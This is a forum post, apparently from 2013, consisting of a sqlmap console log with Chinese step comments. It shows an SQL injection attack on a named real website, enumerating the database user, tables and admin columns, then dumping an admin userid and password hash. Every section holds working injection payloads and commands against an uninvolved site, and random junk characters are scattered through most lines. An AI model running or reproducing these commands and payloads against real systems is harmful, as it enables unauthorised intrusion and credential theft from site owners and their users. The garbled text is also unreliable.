D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
2 V# y% t3 d/ F% \' g4 d5 f1 Y4 Ims "Mysql" --current-user /* 注解:获取当前用户名称
S$ D' E: @% G U6 c sqlmap/0.9 - automatic SQL injection and database takeover tool5 \# O% ]) x4 y
http://sqlmap.sourceforge.net starting at: 16:53:54) h) G" o0 @1 M; d K4 ~
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
4 m6 P1 r7 u6 q session file* ]4 H1 r* j$ W7 n+ ^. ?
[16:53:54] [INFO] resuming injection data from session file
; X m( j0 `* r( {* i5 v1 i7 ~& ?; l[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file' d1 j! b' A3 O4 |, e+ }
[16:53:54] [INFO] testing connection to the target url
5 R" l0 r4 @' m, l/ U1 C c# Qsqlmap identified the following injection points with a total of 0 HTTP(s) reque
( u( o2 T& k+ A N$ ]sts:) o# `, T# s1 b
---- L# k, U3 W* v6 ~& q3 |
Place: GET$ D. L7 `1 t; {8 r1 [! I. Z
Parameter: id3 s: A$ T6 i. V' |/ ^. |- e
Type: boolean-based blind: L( s7 h! i8 S- \" u+ ^5 O
Title: AND boolean-based blind - WHERE or HAVING clause
2 h" m1 `( H9 {% y/ W7 q4 R! C2 w Payload: id=276 AND 799=799- V. d+ ~5 S, X! t/ `! q* D% o; s8 e
Type: error-based' `( ?0 q+ |$ Y: n9 v& [
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
v) Q f; ~* h' o4 p. {+ m. T Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,* N( Y( F& N, c* H5 P0 f
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,586 Q5 X5 @: N" l& z( H4 s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)+ E; x$ l% X- n
Type: UNION query
. a1 @8 t: u. j6 k Title: MySQL UNION query (NULL) - 1 to 10 columns
5 ~( t6 _/ ]& V5 ]$ ~ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR% @" I; g) V2 m/ C h' j
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 y9 i- M" K$ a9 w* M$ [
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
9 n" N/ N( `0 W4 a* H$ n- Z Type: AND/OR time-based blind
- k8 M. I' i7 c0 y% e& p9 J% k Title: MySQL > 5.0.11 AND time-based blind n4 W" Z/ M% A& U* t
Payload: id=276 AND SLEEP(5)
R+ [- J- ?! L( i/ m1 M3 H* O; a. @---; P! X& T2 i- c# E, Z
[16:53:55] [INFO] the back-end DBMS is MySQL$ v4 h7 C) l- J- G: [+ u2 x
web server operating system: Windows5 G9 ]- K8 K, }! C, {- w7 j
web application technology: Apache 2.2.11, PHP 5.3.0
& i$ B- `! B7 zback-end DBMS: MySQL 5.08 Z5 X1 C) T* r) a- j% q
[16:53:55] [INFO] fetching current user
& o: }7 ^" z% ^! Ycurrent user: 'root@localhost'
. V8 d; [& ~ l; n[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
+ Z/ m4 T/ K; f! _( U$ n4 }4 u' Y Xtput\www.wepost.com.hk' shutting down at: 16:53:58
% L+ N! K O7 X
$ p; `9 |6 t6 h2 R. \2 B4 VD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
) q- ^2 {1 N0 Z2 mms "Mysql" --current-db /*当前数据库7 N, Y1 L) |8 A$ D7 F
sqlmap/0.9 - automatic SQL injection and database takeover tool# C4 r1 c* n' m, e, |2 p1 n
http://sqlmap.sourceforge.net starting at: 16:54:16
% k) t; r$ N# y# @9 {[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
" q2 O6 T" B& m6 ^ session file [/ e) z) \* H# L2 N0 {
[16:54:16] [INFO] resuming injection data from session file
; | g2 |7 d0 v[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
5 L. F- Z( m6 P[16:54:16] [INFO] testing connection to the target url
, p1 U" F" H4 @" ?/ ^. Bsqlmap identified the following injection points with a total of 0 HTTP(s) reque. u( P9 ~& _+ w2 c4 h* }3 k
sts:
4 }' t- E" o% r y7 F0 p---0 o* q5 G9 F p
Place: GET
& a2 w: @, V* v" P x1 w5 y: xParameter: id( a" G3 ]7 |$ m5 s
Type: boolean-based blind
1 p) F' O Z N Title: AND boolean-based blind - WHERE or HAVING clause; _: c; Z4 M/ t# ^! U
Payload: id=276 AND 799=799
* v% {, Y; @/ Q3 a- f2 Q ]$ X Type: error-based
9 I- o" X! d: k5 B1 d3 R Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
2 ~% i1 r* x- n- H: M* b4 k Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,9 ?$ { n. q4 a* h
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58: w1 s% ?, q# l0 z* g( I
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
( m1 u f& ~4 W L# e& Q: r, g Type: UNION query
1 K7 ?3 J6 [: [ Title: MySQL UNION query (NULL) - 1 to 10 columns2 Z9 \ j$ Q; P+ [, g
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR9 B! s3 s3 W% q: t
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
0 p9 s+ r" L, _- t& R* H* gCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#- E# ~+ ]! O3 p
Type: AND/OR time-based blind
" g5 r5 c1 n: r" \1 c0 d% g/ f4 G. G4 Q Title: MySQL > 5.0.11 AND time-based blind6 X) Z/ R, C1 E- D
Payload: id=276 AND SLEEP(5)7 q3 V% [4 G- g T3 m: m
---
- o. ? X$ H( x& W[16:54:17] [INFO] the back-end DBMS is MySQL
, _3 E5 c/ ]# W& Lweb server operating system: Windows
D4 M/ E& V/ t7 H/ ^) Cweb application technology: Apache 2.2.11, PHP 5.3.0
1 e1 f1 a1 N( N2 o7 zback-end DBMS: MySQL 5.0
9 ^1 u" d" Q) Z- c: C[16:54:17] [INFO] fetching current database
& E! f9 Z0 Q2 L0 n4 ~+ R/ _current database: 'wepost'
W+ m8 E" k4 B; l[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou, O, H( \) A4 `" L8 u0 [% u0 o
tput\www.wepost.com.hk' shutting down at: 16:54:18
) i7 L9 r3 p2 K! s9 r! }D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
# n+ M% w+ j: |) g" R& Ems "Mysql" --tables -D "wepost" /*获取当前数据库的表名
1 V6 o9 d% r3 V' T sqlmap/0.9 - automatic SQL injection and database takeover tool
, C- t3 I* w! v, N" A0 V http://sqlmap.sourceforge.net starting at: 16:55:256 ?9 Y4 Z( }4 G, T& K/ `
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
1 m2 z; z: H) i) b5 p9 I8 L: t0 S8 s session file
5 J0 N4 P2 K- G$ `. Y2 ][16:55:25] [INFO] resuming injection data from session file! a9 B- @9 w, X& E1 v: X
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 t0 C! S6 \7 L g2 P& Z+ ?0 b[16:55:25] [INFO] testing connection to the target url8 ]' O% f$ j- G5 N) G8 E
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
' K I8 @: l0 g: F/ w0 msts:& x) C$ A, `2 |8 ^) K
---! N* f1 p* D& A8 N& e$ H
Place: GET
$ @7 |0 l) k Y; b: U/ Z8 |9 {1 |Parameter: id) Z! O5 b+ z2 u! T. B% ]4 ~! q$ V2 x
Type: boolean-based blind6 l0 D; a# z" q, q: b5 N
Title: AND boolean-based blind - WHERE or HAVING clause
* X1 Z6 H: c1 i6 E5 b Payload: id=276 AND 799=799
) ]2 p9 G( x7 r# p7 n4 b, r Type: error-based; F, f/ V/ g) N9 z
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
$ r* ?+ w( h6 i4 a7 x Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
" X+ v1 ]' I1 _+ ?4 y$ X* P120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,585 k: q0 w6 G1 i4 b* d, O- l7 F
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
% P& q% ~2 ]2 F$ E2 a Type: UNION query1 y9 S: ?# J% ?, l
Title: MySQL UNION query (NULL) - 1 to 10 columns0 I8 t& J3 h! ~/ h, {
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 W" Z1 \: ?% {
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
" ^* E$ ~6 Q# a0 M; eCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; q: C( r" S# G8 I j Type: AND/OR time-based blind
5 e7 r3 H$ G8 w) `3 W( U3 E Title: MySQL > 5.0.11 AND time-based blind
* x* u6 f0 C4 S0 r0 b6 t; b Payload: id=276 AND SLEEP(5)
1 ~ A* h7 h* U+ W/ ]# j---4 t, |9 K& b0 E0 H3 y }6 E
[16:55:26] [INFO] the back-end DBMS is MySQL) [7 G. e0 T9 _1 R; t2 \( R
web server operating system: Windows K) w) |$ t. ]4 _- Y
web application technology: Apache 2.2.11, PHP 5.3.0
) m3 |- X' i! f4 g* \back-end DBMS: MySQL 5.0
% r8 |' E+ X6 C[16:55:26] [INFO] fetching tables for database 'wepost'
8 f' }* M o3 t% q& i[16:55:27] [INFO] the SQL query used returns 6 entries: O/ w1 Z( |( [2 l
Database: wepost
! H5 i( H/ N' N/ x[6 tables]
$ ~- x( G G6 H6 m7 _1 i ]+-------------+
* K! Y0 |$ ]2 \9 D, u+ n- ?| admin |$ ~5 N, _. F9 |# u/ b. g
| article |0 v# U3 p' c3 w- D) r7 r
| contributor |/ D8 V) d5 Y1 |9 j0 o
| idea |6 C9 E1 @- ?# c$ _3 A
| image |
4 y# i6 [# r5 p E| issue |
/ G5 ~( C/ ~* _2 }% z1 e9 s+-------------+2 _( t+ S& d: t/ R/ o. j
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
/ _& n% P: F$ y2 Ttput\www.wepost.com.hk' shutting down at: 16:55:333 O' u# E+ d* x7 x) l; p1 O
, u. a7 L# a4 v" LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
' ^9 G( G8 Q: B1 ?3 g; Cms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名
, u: x2 F+ t5 `6 L/ B; \ sqlmap/0.9 - automatic SQL injection and database takeover tool% l6 j# L2 u0 I
http://sqlmap.sourceforge.net starting at: 16:56:06
+ f' _& S8 G w/ A- t8 Asqlmap identified the following injection points with a total of 0 HTTP(s) reque0 U' S/ C: Y0 k: o, u
sts:
6 J* A7 j3 H h1 [. R+ N---& J- k1 e" ~6 U- p9 a v4 `
Place: GET0 }: ] `/ n: V) t3 F8 j7 f* w
Parameter: id
! w7 L2 V# a, N" r Type: boolean-based blind
( c7 d4 k6 }! n8 |0 F Title: AND boolean-based blind - WHERE or HAVING clause* y5 E' s% C* s: }
Payload: id=276 AND 799=799( r7 h. w# J. g
Type: error-based
+ D% N8 z, ?6 ~& G$ C; k$ k$ G* ] Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause1 J+ @8 g; k$ V* U
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,& E# W6 Y% j& _; a
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58 p; e, [3 \/ Z. z/ W
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)& k5 |4 p0 B: t' t
Type: UNION query8 `$ H4 w. E" Y/ B; J. R
Title: MySQL UNION query (NULL) - 1 to 10 columns; s% ^, ?) f3 c) a( g; Y
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 t3 N. M% }1 l. n1 T8 n; C+ J1 ^" C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),! b0 v" t3 ?/ [3 t% e8 B) ~
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#! u$ ^, a1 ]: f. {: c d
Type: AND/OR time-based blind
) E: L8 T0 h# ~ Title: MySQL > 5.0.11 AND time-based blind1 n: ?" ?! G" P$ H& A5 w
Payload: id=276 AND SLEEP(5) G" Z0 k+ K# c2 p& A! M0 [
---6 M" X: D6 c0 j
web server operating system: Windows
) E$ M. S- M4 u3 r8 `4 O: q# P; rweb application technology: Apache 2.2.11, PHP 5.3.0- G7 Q' B/ p% C4 J0 H& E* d
back-end DBMS: MySQL 5.0
8 F6 L$ U+ L$ E9 _6 y[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
1 F% H& x M$ ] W4 T3 Rssion': wepost, wepost
9 z0 t6 F, {7 W9 [( g. GDatabase: wepost
$ m# o7 E# k6 }3 MTable: admin
_7 |7 ^# X1 G u# J5 ^[4 columns]
, P2 m. X2 l2 \# y+----------+-------------+
: k9 m* @: ^* w+ h| Column | Type |
# A) ?/ h6 j* _+----------+-------------+" e. j) P: d1 w+ l. b! R/ q0 x
| id | int(11) |
9 @& L- k. ]$ p+ w| password | varchar(32) | @ s4 n0 d% s5 o
| type | varchar(10) |1 ^5 A G {6 I6 o
| userid | varchar(20) |# \0 |0 G* e- G* m7 Y. H
+----------+-------------+8 e3 Q! }( q; v% y( v H
shutting down at: 16:56:19% y- E. E( x6 L0 a: c
0 G1 z, p& f' V: j. k5 @D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
! K9 N9 l9 x5 P, mms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
, c, u* W6 c( R% d: {3 | s sqlmap/0.9 - automatic SQL injection and database takeover tool
! E/ q5 I1 i( r! w http://sqlmap.sourceforge.net starting at: 16:57:14
2 ]6 f7 x$ l" h- U$ G2 ]sqlmap identified the following injection points with a total of 0 HTTP(s) reque
. y" K, U- Z7 h- w+ _sts:8 W( \1 A/ z9 L6 ]& }' U
---( c# U6 |5 \8 `6 u. L
Place: GET( e4 S& t8 l: k @' E
Parameter: id
, D6 O' j* I( D$ j9 v Type: boolean-based blind
' Z5 ~+ i$ w6 h f: r1 c Title: AND boolean-based blind - WHERE or HAVING clause% F* {- o2 i* V
Payload: id=276 AND 799=799: S, A- p: |# Q. A/ B3 X7 j+ m: ?( A
Type: error-based; a( d; r* y3 F: C
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause9 } v) L, o+ g" M! j% i; I6 i& m% g* h
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,2 K7 K" ]7 {1 S1 t' i
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,584 r! {2 @& B5 u$ a- s
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- u% z5 b/ ^) O; W$ |5 S/ X3 E% r: a Type: UNION query
3 j: V" O4 f! {- u* U9 ` Title: MySQL UNION query (NULL) - 1 to 10 columns
Q# A) y# ]: s Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
8 U5 v5 q6 ]9 \! N(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),0 ]0 [ M# T x$ B4 f$ X4 S" u
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
7 `/ j4 \% p2 ?: V" Q) `. E/ @ Type: AND/OR time-based blind
6 H) _% ?6 {, y Title: MySQL > 5.0.11 AND time-based blind
7 f5 P+ K/ D( Y5 T- R5 m7 Z Payload: id=276 AND SLEEP(5)
/ o: r3 q9 m( {3 b M---9 k% k, y& R& w1 w t# I/ U
web server operating system: Windows8 l+ F- @; e: I+ @- ~7 C" I; [( F3 U0 x
web application technology: Apache 2.2.11, PHP 5.3.0- o- @% a7 R3 n U$ f( o
back-end DBMS: MySQL 5.0
9 s! w6 l7 A! M/ |recognized possible password hash values. do you want to use dictionary attack o
$ m. r5 U! _' z: q! ^! ?3 I! i+ An retrieved table items? [Y/n/q] y# a3 G c- M, t$ a
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]6 |( D1 J% W8 ~- A
do you want to use common password suffixes? (slow!) [y/N] y' q3 ?' i0 v n& g, |# t+ d- O4 W' }
Database: wepost- ?' P$ u; A' M! h4 ~2 @3 N
Table: admin! p: Z' W! M5 ^2 L
[1 entry]
' a' ^# ~6 |' Z+----------------------------------+------------+
9 ] [$ n* Z6 }4 K| password | userid |* J% X2 B$ d! z) q- `( ~/ S
+----------------------------------+------------+( V% p. z5 x# T1 C7 r- X9 c
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |: e, x9 O1 c4 q6 V" o6 D& j
+----------------------------------+------------+% M( R8 M! e8 z9 Z r3 F% J4 ^( p
shutting down at: 16:58:14- ?# R5 v% E2 [& Q
8 @* |; ^: }) \' w# B1 r o: Y6 R* X0 WD:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对